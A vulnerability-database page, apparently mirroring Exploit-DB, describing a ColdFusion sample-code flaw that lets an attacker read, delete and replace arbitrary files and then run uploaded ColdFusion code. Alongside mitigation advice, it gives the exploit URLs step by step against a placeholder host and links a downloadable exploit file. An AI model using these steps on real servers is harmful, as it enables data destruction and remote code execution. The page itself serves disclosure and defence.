header-logo
Suggest Exploit
vendor:
ColdFusion
by:
7.5
CVSS
HIGH
Arbitrary File Deletion and Execution
CWE
Product Name: ColdFusion
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

Arbitrary File Deletion and Execution in ColdFusion

The vulnerability allows an attacker to display and delete arbitrary files on the system by exploiting a URL parameter in ColdFusion. The attacker can also upload and execute ColdFusion files without them being deleted.

Mitigation:

Apply security patches provided by the vendor to fix the vulnerability. Restrict access to the vulnerable URL or disable the affected functionality if not needed.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/115/info

To display and delete any file on the system use an URL of the following form:

http://www.victim.test/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=C:\the\target\file

To upload files to the sever first find out the location of the sample code on the server by uploading a dummy file by using http://www.victim.test/cfdocs/expeval/openfile.cfm. After uploading a dummy file it will be displayed for you. The URL will be for the form:

http://www.victim.test/cfdocs/expeval/ExprCalc.cfm?RequestTimeout=2000&OpenFilePath=C:\Inetpub\wwwroot\cfdocs\expeval\.\dummy.txt

Now replace the "dummy.txt" string by "ExprCalc.cfm" to delete that file. We can now upload and execute ColdFusion files in the server without them being deleted.

https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19093.cfm

Navigation

Suggest Exploit

Services By CQR